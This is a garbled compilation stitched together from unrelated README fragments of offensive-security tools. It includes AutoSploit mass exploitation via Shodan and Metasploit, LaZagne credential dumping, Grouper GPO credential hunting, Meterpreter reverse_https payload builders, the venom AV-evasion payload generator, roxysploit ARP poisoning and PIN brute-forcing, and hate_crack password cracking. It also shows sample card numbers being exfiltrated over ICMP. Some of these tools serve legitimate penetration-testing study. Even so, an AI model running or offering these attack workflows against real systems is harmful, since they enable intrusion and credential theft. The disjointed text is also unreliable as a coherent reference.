./ping.py --ip 1.2.3.4 --asciiFile file

4587965312457852 01/15 456 Martino Jones | 4567965382457452 03/16 236 Martino Joe

['0110100', '0110101', '0111000', '0110111', '0111001', '0110110', '0110101', '0110011', '0110001', 
'0110010', '0110100', '0110101', '0110111', '0111000', '0110101', '0110010', '0100000', '0110000', 
'0110001', '0101111', '0110001', '0110101', '0100000', '0110100', '0110101', '0110110', '0100000', 
'1001101', '1100001', '1110010', '1110100', '1101001', '1101110', '1101111', '0100000', '1001010', 
'1101111', '1101110', '1100101', '1110011', '0100000', '1111100', '0100000', '0110100', '0110101', 
'0110110', '0110111', '0111001', '0110110', '0110101', '0110011', '0111000', '0110010', '0110100', 
'0110101', '0110111', '0110100', '0110101', '0110010', '0100000', '0110000', '0110011', '0101111', 
'0110001', '0110110', '0100000', '0110010', '0110011', '0110110', '0100000', '1001101', '1100001', 
'1110010', '1110100', '1101001', '1101110', '1101111', '0100000', '1001010', '1101111', '1100101', 
'0001010']

Calculating offsets

4 5 8 7 9 6 5 3 1 2 4 5 7 8 5 2   0 1 / 1 5   4 5 6   M a r t i n o   J o n e s   |   4 5 6 7 9 6 5 3 8 2 4 5 7 4 5 2   0 3 / 1 6   2 3 6   M a r t i n o   J o e 

• encode_text: You provide a string and the program hides it
• encode_image: You provide an OpenCV image and the method iterates for every pixel in order to hide them. A good practice is to have a carrier 8 times bigger than the image to hide (so that each pixel will be put only in the first bit).
• encode_binary: You provide a binary file to hide; This method can obfuscate any kind of file.

Only images without compression are supported, namely not JPEG as LSB bits might get tampered during the compression phase.

pip install -r requirements.txt

LSBSteg.py

Usage:
  LSBSteg.py encode -i <input> -o <output> -f <file>
  LSBSteg.py decode -i <input> -o <output>

Options:
  -h, --help                Show this help
  --version                 Show the version
  -f,--file=<file>          File to hide
  -i,--in=<input>           Input image (carrier)
  -o,--out=<output>         Output image (or extracted file)

#encoding
steg = LSBSteg(cv2.imread("my_image.png"))
img_encoded = steg.encode_text("my message")
cv2.imwrite("my_new_image.png", img_encoded)

#decoding
im = cv2.imread("my_new_image.png")
steg = LSBSteg(im)
print("Text value:",steg.decode_text())

#encoding
steg = LSBSteg(cv2.imread("carrier.png")
new_im = steg.encode_image(cv2.imread("secret_image.jpg"))
cv2.imwrite("new_image.png", new_im)

#decoding
steg = LSBSteg("new_image.png")
orig_im = steg.decode_image()
cv.SaveImage("recovered.png", orig_im)

#encoding
steg = LSBSteg(cv2.imread("carrier.png"))
data = open("my_data.bin", "rb").read()
new_img = steg.encode_binary(data)
cv2.imwrite("new_image.png", new_img)

#decoding
steg = LSBSteg(cv2.imread("new_image.png"))
binary = steg.decode_binary()
with open("recovered.bin", "rb") as f:
    f.write(data)

• Decoding an instruction (in DBA IR)
• Loading execution traces generated by Pinsec
• Triggering analyzes on Binsec and retrieving results

• protobuf
• ZMQ
• capstone (for trace disassembly)
• graphviz (to draw dependency within a formula)
• pyparsing
• enum
• path.py
• plotly (optional)

1. In IDA: Copy the idasec folder in the python directory of IDA and then load idasec.py with Ctrl+F7
2. As a standalone app, just run ./idasec.py (no yet ready)

• dockerhub pagedocker run --rm -it -p 80:80 vulnerables/web-dvwa

• DVWA v1.9 Source (Stable) - [1.3 MB] Download ZIP - Released 2015-10-05
• DVWA v1.0.7 LiveCD - [480 MB] Download ISO - Released 2010-09-08
• DVWA Development Source (Latest) Download ZIP // git clone https://github.com/ethicalhack3r/DVWA

$_DVWA[ 'db_user' ] = 'root';
$_DVWA[ 'db_password' ] = 'p@ssw0rd';
$_DVWA[ 'db_database' ] = 'dvwa';

mysql> create database dvwa;
Query OK, 1 row affected (0.00 sec)

mysql> grant all on dvwa.* to dvwa@localhost identified by 'xxx';
Query OK, 0 rows affected, 1 warning (0.01 sec)

mysql> flush privileges;
Query OK, 0 rows affected (0.00 sec)

• ./hackable/uploads/ - Needs to be writable by the web service (for File Upload).
• ./external/phpids/0.6/lib/IDS/tmp/phpids_log.txt - Needs to be writable by the web service (if you wish to use PHPIDS).

• allow_url_include = on - Allows for Remote File Inclusions (RFI) [allow_url_include]
• allow_url_fopen = on - Allows for Remote File Inclusions (RFI) [allow_url_fopen]
• safe_mode = off - (If PHP <= v5.4) Allows for SQL Injection (SQLi) [safe_mode]
• magic_quotes_gpc = off - (If PHP <= v5.4) Allows for SQL Injection (SQLi) [magic_quotes_gpc]
• display_errors = off - (Optional) Hides PHP warning messages to make it less verbose [display_errors]

• $_DVWA[ 'recaptcha_public_key' ]& $_DVWA[ 'recaptcha_private_key' ] - These values need to be generated from: https://www.google.com/recaptcha/admin/create

<IfModule mod_php5.c>
    php_flag magic_quotes_gpc off
    #php_flag allow_url_fopen on
    #php_flag allow_url_include on
</IfModule>

<IfModule mod_php5.c>
    magic_quotes_gpc = Off
    allow_url_fopen = On
    allow_url_include = On
</IfModule>

• curl
• systemd

1. Download stacer_1.0.8_amd64.deb from the Stacer releases page.
2. Run sudo dpkg -i stacer*.deb on the downloaded package.
3. Launch Stacer using the installed stacer command.

1. Download stacer_1.0.8_x64.rpm from the Stacer releases page.
2. Run sudo rpm --install stacer*.rpm on the downloaded package.
3. Launch Stacer using the installed stacer command.

$ mkdir build && cd build
$ cmake -DCMAKE_BUILD_TYPE=Release -DCMAKE_PREFIX_PATH=/qt/path/bin -G Ninja  ..
$ ninja
$ output/bin/stacer

• action: sets the action when adding a rule, default: DROP
• checkaggrbin: path to the checkaggr.py script, default: ./checkaggr.py
• cleanupconfirmation: asks for confirmation before running the clean command, set to false for cron usage, default: true
• date: set the date format for the firewall comments, default: $(date +%d%m%Y) -> 22062016
• dateipset: set the date format for the ipset firewall comments, leave this on the default to avoid breaking some of the functions, default: $(date +%Y%m%d) -> 20160622
• ipsetname: sets the IPSET list name, default: blockedips
• ipsetservers: sets the servers that use IPSET instead of iptables, default: "lvs05.example.com lvs06.example.com"
• fwchain: name of the firewall chain to add/del/search, default: INPUT
• masklimit: max size of the ip ranges that can be added, default: /21
• precheck: check if the ip that is about to be added is already in the firewall or part of a larger added range, might be a bit slow on large firewalls on IPv6 (~25 sec. for searching 500 ip ranges per server), default: true
• protected: enable the added protected ranges, default: true
• protectedranges: ip ranges that are excluded from the 'add' function, usually the ranges owned by the local network, default: "172.16.0.0/12 10.0.0.0/8 192.168.0.0/16"
• pythonbin: location of the used Python binary, default: /usr/bin/python3
• servers: sets the servers that use iptables only, default: "lvs01.example.com lvs02.example.com lvs03.example.com lvs04.example.com"
• The IPv6 functions are marked with the '6' suffix

cfc.sh add n.n.n.n/NN '<optional comment>'
cfc6.sh add <IPv6_address_range> '<optional comment>'

cfc.sh clean <older_than_number_of_days>

cfc.sh del n.n.n.n/NN
cfc6.sh del <IPv6_address_range>

cfc.sh find <string>
cfc6.sh find <string>

cfc.sh findip n.n.n.n/NN
cfc6.sh findip <IPv6_address_range>

cfc.sh ipsethostinit <server_name>
cfc6.sh ipsethostinit <server_name>

cfc.sh last <nr_of_most_recent_rules>
cfc6.sh last <nr_of_most_recent_rules>

git clone https://github.com/NullArray/AutoSploit.git

+------------------+----------------------------------------------------+
|     Option       |                   Summary                          |
+------------------+----------------------------------------------------+
|1. Usage          | Display this informational message.                |
|2. Gather Hosts   | Query Shodan for a list of platform specific IPs.  |
|3. View Hosts     | Print gathered IPs/RHOSTS.                         |
|4. Exploit        | Configure MSF and Start exploiting gathered targets|
|5. Quit           | Exits AutoSploit.                                  |
+------------------+----------------------------------------------------+

use exploit/linux/http/netgear_wnr2000_rce;exploit -j; 

shodan
blessings

pip install shodan
pip install blessings

pip install -r requirements.txt

• Using the powershellscript

PS C:\Users\test\Desktop> Import-Module .\dump.ps1
PS C:\Users\test\Desktop> Dump
Folder dump created successfully !

• Using the python script

python dump.py

• Launch Lazagne with password if you have it

python laZagneForensic.py all -remote /tmp/dump -password 'ZapataVive'

• Launch Lazagne without password

python laZagneForensic.py all -remote /tmp/dump

• The file should be mounted on your filesystem

test:~$ ls /tmp/disk/
total 769M
drwxr-xr-x 2 root root    0 févr.  1 14:05 ProgramData
-rwxr-xr-x 1 root root 256M févr.  1 14:05 swapfile.sys
-rwxr-xr-x 1 root root 512M févr.  1 14:05 pagefile.sys
drwxr-xr-x 2 root root    0 janv. 31 00:35 System Volume Information
dr-xr-xr-x 2 root root    0 janv. 26 10:17 Program Files (x86)
dr-xr-xr-x 2 root root    0 janv. 25 18:13 Program Files
drwxr-xr-x 2 root root    0 janv. 19 10:09 Windows
drwxr-xr-x 2 root root    0 janv. 16 15:52 Homeware
drwxr-xr-x 2 root root    0 janv.  9 17:33 PerfLogs
drwxr-xr-x 2 root root    0 nov.  22 20:37 Recovery
drwxr-xr-x 2 root root 4,0K nov.  22 20:31 Documents and Settings
dr-xr-xr-x 2 root root    0 nov.  22 20:31 Users

• Launch Lazagne with password if you have it

python laZagneForensic.py all -local /tmp/disk -password 'ZapataVive'

• Launch Lazagne without password

python laZagneForensic.py all -local /tmp/disk

• Happy DPAPI!
• ReVaulting! Decryption and opportunities
• Windows ReVaulting
• DPAPI exploitation during pentest and password cracking

• GPOs which grant modify permissions on the GPO itself to non-default users.
• Startup and shutdown scripts
  • arguments and script themselves often include creds.
  • scripts are often stored with permissions that allow you to modify them.
• MSI installers being automatically deployed
  • again, often stored somewhere that will grant you modify permissions.
• Good old fashioned Group Policy Preferences passwords.
• Autologon registry entries containing credentials.
• Other creds being stored in the registry for fun stuff like VNC.
• Scheduled tasks with stored credentials.
  • Also often run stuff from poorly secured file shares.
• User Rights
  • Handy to spot where admins accidentally granted 'Domain Users' RDP access or those fun rights that let you run mimikatz even without full admin privs.
• Tweaks to local file permissions
  • Good for finding those machines where the admins just stamped "Full Control" for "Everyone" on "C:\Program Files".
• File Shares
• INI Files
• Environment Variables
• ... and much more! (well, not very much, but some)

Get-GPOReport -All -ReportType xml -Path C:\temp\gporeport.xml

Import-Module grouper.ps1

Invoke-AuditGPOReport -Path C:\temp\gporeport.xml

-showDisabled

-Level

1. Show me all the settings you can.
2. (Default) Show me only settings that seem 'interesting' but may or may not be vulnerable.
3. Show me only settings that are definitely a super bad idea and will probably have creds in them or are going to otherwise grant me admin on a host.

runas /netonly /user:domain\user powershell.exe

Get-GpoReport -Domain example.com -All -ReportType xml -Path C:\temp\gporeport.xml

1. Get some GPOReport xml output that includes the type of policy/setting you want Grouper to be able to find. This may require knocking up a suitable policy in a lab environment.
   
2. Find the <GPO> xml object that matches your target policy.
   
3. Find the subsection of the xml that matches the info you want to pull out of the policy. Policy settings are divided into either User or Computer policy, so this will usually be in either:
   

   GPO.Computer.ExtensionData.Extension
   or
   GPO.User.ExtensionData.Extension

4. Now's the annoying part - the reason this code is such a mess is that each policy setting section is structured differently and they use wildly differing naming conventions, so you're going to need to figure out how your target policy is structured. Good luck?
   
5. Here's a skeleton of a check function you can use to get started. Make sure it either doesn't return at all or returns $null if nothing interesting is found.
   

   Function Get-GPOThing {
       [cmdletbinding()]
       Param (
           [Parameter(Mandatory=$true)][ValidateNotNullOrEmpty()]  [System.Xml.XmlElement]$polXML,
           [Parameter(Mandatory=$true)][ValidateSet(1,2,3)][int]$level
       )
   
       ######
       # Description: Checks for Things.
       # Vulnerable: Description of what it shows if Level -eq 3
       # Interesting: Description of what it shows if Level -eq 2
       # Boring: All Things.
       ######
   
    $settingsThings = ($polXml.Thing.ExtensionData.Extension.Thing |  Sort-Object GPOSettingOrder)
   
       if ($settingsThings) {
        foreach ($setting in $settingsThings) {
               if ($level -eq 1) {
                   $output = @{}
                   $output.Add("Name", $setting.Name)
                   if ($setting.SettingBoolean) {
                       $output.Add("SettingBoolean", $setting.SettingBoolean)
                   }
                   if ($setting.SettingNumber) {
                       $output.Add("SettingNumber", $setting.SettingNumber)
                   }
                   $output.Add("Type", $setting.Type.InnerText)
                   Write-Output $output
                   ""
               }
           }
       }
   }
   

6. Ctrl-f your way down to "$polchecks" and add it to the array of checks with the others.
   
7. Test it out.
   
8. If it works, submit a pull request!
   
9. If you get stuck, hit me up. I'll try to help if I can scrounge a few minutes together.

• AMD Secure Memory Encryption Support– Secure Memory Encryption is a feature that will be in newer AMD processors that enables automatic encryption and decryption of DRAM. The addition of this features means that systems will no longer (in theory) be vulnerable to cold-boot attacks because, even with physical access, the memory will be not be readable.
• Increased Memory Limits– Current (and older) 64-bit processors have a limit of 64 TB of physical address space and 256 TB of virtual address space (VAS), which was sufficient for more than a decade but with some server hardware shipping with 64 TB of memory, the limits have been reached. Fortunately, upcoming processors will enable 5-level paging, support for which is included in the 4.14 kernel. In short, this means that these new processors will support 4 PB of physical memory and 128 PB of virtual memory. That’s right, petabytes.

apt update && apt full-upgrade

wget -q -O - https://archive.kali.org/archive-key.asc | apt-key add

• Python 2.x
• validators
• python-whois
• dnspython
• requests

• ask
• bing
• crt
• dns
• dogpile
• github
• google
• googleplus
• instagram
• linkedin
• netcraft
• pgp
• reddit
• reverse dns
• twitter
• vhosts
• virustotal
• whois
• yahoo
• yandex
• youtube

pip install -r requirements.txt

    ______           __  ___           __ __
  / ____/___ ______/  |/  /___ ______/ //_/
 / / __/ __ `/ ___/ /|_/ / __ `/ ___/ ,<
/ /_/ / /_/ (__  ) /  / / /_/ (__  ) /| |
\____/\__,_/____/_/  /_/\__,_/____/_/ |_|

GasMasK - All in one Information gathering tool - OSINT
Ver. 1.0
Written by: @maldevel
https://www.twelvesec.com/

usage: gasmask.py [-h] -d DOMAIN [-s NAMESERVER] [-x PROXY] [-l LIMIT]
                  [-i MODE] [-o BASENAME]

optional arguments:
  -h, --help            show this help message and exit
  -d DOMAIN, --domain DOMAIN
                        Domain to search.
  -s NAMESERVER, --server NAMESERVER
                        DNS server to use.
  -x PROXY, --proxy PROXY
                        Use a proxy server when retrieving results from search engines (eg. '-x http://127.0.0.1:8080')
  -l LIMIT, --limit LIMIT
                        Limit the number of search engine results (default: 100)                                                          .
  -i MODE, --info MODE  Limit information gathering (basic,whois,dns,revdns,vhos                                                          ts,google,bing,yahoo,ask,dogpile,yandex,linkedin,twitter,googleplus,youtube,reddit,github,instagram,crt,pgp,netcraft,virustotal).
  -o BASENAME, --output BASENAME
                        Output in the four major formats at once (markdown, txt, xml and html).

python gasmask.py -d example.com

python gasmask.py -d example.com -i whois,dns,revdns

python gasmask.py -d example.com -i basic,yahoo,github -o myresults/example_com_search_results

• EmailHarvester
• theHarvester

git clone https://github.com/IanHarvey/bluepy.git
cd bluepy
python setup.py build
sudo python setup.py install

git clone https://github.com/evilsocket/bleah.git
cd bleah
python setup.py build
sudo python setup.py install

usage: bleah [-h] [-i HCI] [-t TIMEOUT] [-s SENSITIVITY] [-b MAC] [-f] [-e] [-u UUID] [-d DATA] [-r DATAFILE]

optional arguments:
  -h, --help            show this help message and exit
  -i HCI, --hci HCI     HCI device index.
  -t TIMEOUT, --timeout TIMEOUT
                        Scan delay, 0 for continuous scanning.
  -s SENSITIVITY, --sensitivity SENSITIVITY
                        dBm threshold.
  -b MAC, --mac MAC     Filter by device address.
  -f, --force           Try to connect even if the device doesn't allow to.
  -e, --enumerate       Connect to available devices and perform services
                        enumeration.
  -u UUID, --uuid UUID  Write data to this characteristic UUID (requires --mac
                        and --data).
  -d DATA, --data DATA  Data to be written.
  -r DATAFILE, --datafile DATAFILE
                        Read data to be written from this file.

sudo bleah -t0

sudo bleah -b "aa:bb:cc:dd:ee:ff" -e

sudo bleah -b "aa:bb:cc:dd:ee:ff" -u "c7d25540-31dd-11e2-81c1-0800200c9a66" -d "hello world"

Staged (payload.bat|ps1|txt|exe):
windows/meterpreter/reverse_winhttps
windows/meterpreter/reverse_https
windows/x64/meterpreter/reverse_https

Stageless (binary.exe):
windows/meterpreter_reverse_https
windows/x64/meterpreter_reverse_https

• xterm
• zenity
• metasploit
• postgresql

• This tool will NOT evade AV detection, its made to prevent the data beeing transmited from client (payload) to server beeing captured (Eavesdropping)
• If you decided to use a 64bit payload, then edit settings file and change 'MSF_ENCODER=x86/shikata_ga_nai' to one payload arch compatible encoder(64bit)
• Only in 'staged' builds, Users are allowed to chose the extension (bat|ps1|txt|exe)

1° - Download framework from github
     git clone https://github.com/r00t-3xp10it/Meterpreter_Paranoid_Mode-SSL.git

2° - Set files execution permitions
     cd Meterpreter_Paranoid_Mode-SSL
     sudo chmod +x *.sh

3° - Config tool settings
     nano settings

4° - Run main tool
     sudo ./Meterpreter_Paranoid_Mode.sh

$ git clone https://github.com/Eitenne/roxysploit.git; cd roxysploit; sudo /bin/bash install

rsf > use Picklock
rsf (plugins/picklock) > help


Core Commands
=============

  Command         Description
  -------         -----------
  help            show help menu
  execute         run the plugin
  exit            exit the current plugin

rsf (plugins/picklock) > execute
[?] OS :: Select the devices os

*0) Android :: Bruteforce 4digit pincode usb debugging
 1) Linux   :: Bruteforce Encrypted partions

[+] device: [0]:

rsf > use Poppy
rsf (plugins/poppy) > execute
[?] Interface :: Your interface
[+] interface: [wlan0]: wlp6s0
[?] Target :: Enter the targets ip
[+] target: [192.326.1.25]: 192.168.1.2
[?] Gateway :: Enter the gateway/router ip
[+] router: [192.168.1.1]:
[?] Function :: Would you like to setup dns spoofing?

*0) no :: Disable dns spoofing
 1) yes :: Enable dns spoofing

[+] function: [0]:
[?] Configuring Plugin

Name             Set Value
----             ----------
Interface        wlp6s0
Target           192.168.1.2
Router           192.168.1.1
Plugin           plugins/poppy


[?] Execute Plugins? [yes]:  
[*] Enabling IP Forwarding...
[*] Poisoning Targets...

//install
$ sudo configure.sh -install

• Zenity
• Metasploit
• GCC (compiler)
• Pyinstaller (compiler)
• mingw32 (compiler)
• pyherion.py (crypter)
• wine (emulator)
• PEScrambler.exe (PE obfuscator)
• apache2 (webserver)| winrar (wine)
• vbs-obfuscator (obfuscator)
• avet (Daniel Sauder)
• shellter (KyRecon)
• ettercap (MitM + DNS_Spoofing)
• encrypt_PolarSSL (AES crypter)

1° - Download framework from github
     git clone https://github.com/r00t-3xp10it/venom.git

2° - Set files execution permitions
     cd venom-main
     sudo chmod -R +x *.sh
     sudo chmod -R +x *.py

3° - Install dependencies
     cd aux
     sudo ./setup.sh

4° - Run main tool
     sudo ./venom.sh

• Emails
• IP addresses
• Domains
• Information on WEB technology
• Type of Firewall
• NS and MX records
• Nmap to IP addresses and Domains.

• Dnsrecon
• Dnsenum
• Dig
• Blindcrawl
• Nslookup
• Whatweb
• Wafw00f
• Nmap http-waf-detect http-waf-fingerprint
• Whois

git clone https://github.com/BillyV4/ID-entify.git
cd ID-entify
chmod 777 Installer.sh
./Installer.sh

python /usr/share/ID-entify/ID-entify.py 

python /usr/share/ID-entify/ID-entify-report.py

python tophat.py <local host> <local port>

mkdir -p hashcat/deps  
git clone https://github.com/KhronosGroup/OpenCL-Headers.git hashcat/deps/OpenCL
cd hashcat/
make
make install  

git clone https://github.com/trustedsec/hate_crack.git

• Customize binary and wordlist paths in "config.json"
• Make sure that at least "rockyou.txt" is within your "wordlists" path

usage: python wordlist_optimizer.py <input file list> <output directory>
$ python wordlist_optimizer.py wordlists.txt ../optimized_wordlists  

$ hashcat --help |grep -i ntlm
   5500 | NetNTLMv1                                        | Network protocols
   5500 | NetNTLMv1 + ESS                                  | Network protocols
   5600 | NetNTLMv2                                        | Network protocols
   1000 | NTLM                                             | Operating-Systems

$ ./hate_crack.py  1000

  ___ ___         __             _________                       __    
 /   |   \_____ _/  |_  ____     \_   ___ \____________    ____ |  | __
/    ~    \__  \\   __\/ __ \    /    \  \/\_  __ \__  \ _/ ___\|  |/ /
\    Y    // __ \|  | \  ___/    \     \____|  | \// __ \\  \___|    < 
 \___|_  /(____  /__|  \___  >____\______  /|__|  (____  /\___  >__|_ \
       \/      \/          \/_____/      \/            \/     \/     \/
                         Public Release
                          Version 1.00


 (1) Quick Crack
 (2) Extensive Pure_Hate Methodology Crack
 (3) Brute Force Attack
 (4) Top Mask Attack
 (5) Fingerprint Attack
 (6) Combinator Attack
 (7) Hybrid Attack
 (8) Pathwell Top 100 Mask Brute Force Crack
 (9) PRINCE Attack
 (10) YOLO Combinator Attack

 (97) Display Cracked Hashes
 (98) Display README
 (99) Quit

Select a task:

• Runs a dictionary attack using all wordlists configured in your "hcatOptimizedWordlists" path and applies the "best64.rule", with the option of chaining the "best64.rule".

• Brute Force Attack (7 characters)
• Dictionary Attack
  • All wordlists in "hcatOptimizedWordlists" with "best64.rule"
  • wordlists/rockyou.txt with "d3ad0ne.rule"
  • wordlists/rockyou.txt with "T0XlC.rule"
• Top Mask Attack (Target Time = 4 Hours)
• Fingerprint Attack
• Combinator Attack
• Hybrid Attack
• Extra - Just For Good Measure
  • Runs a dictionary attack using wordlists/rockyou.txt with chained "combinator.rule" and "InsidePro-PasswordsPro.rule" rules

• Runs several hybrid attacks using the "rockyou.txt" wordlists.
  • Hybrid Wordlist + Mask - ?s?d wordlists/rockyou.txt ?1?1
  • Hybrid Wordlist + Mask - ?s?d wordlists/rockyou.txt ?1?1?1
  • Hybrid Wordlist + Mask - ?s?d wordlists/rockyou.txt ?1?1?1?1
  • Hybrid Mask + Wordlist - ?s?d ?1?1 wordlists/rockyou.txt
  • Hybrid Mask + Wordlist - ?s?d ?1?1?1 wordlists/rockyou.txt
  • Hybrid Mask + Wordlist - ?s?d ?1?1?1?1 wordlists/rockyou.txt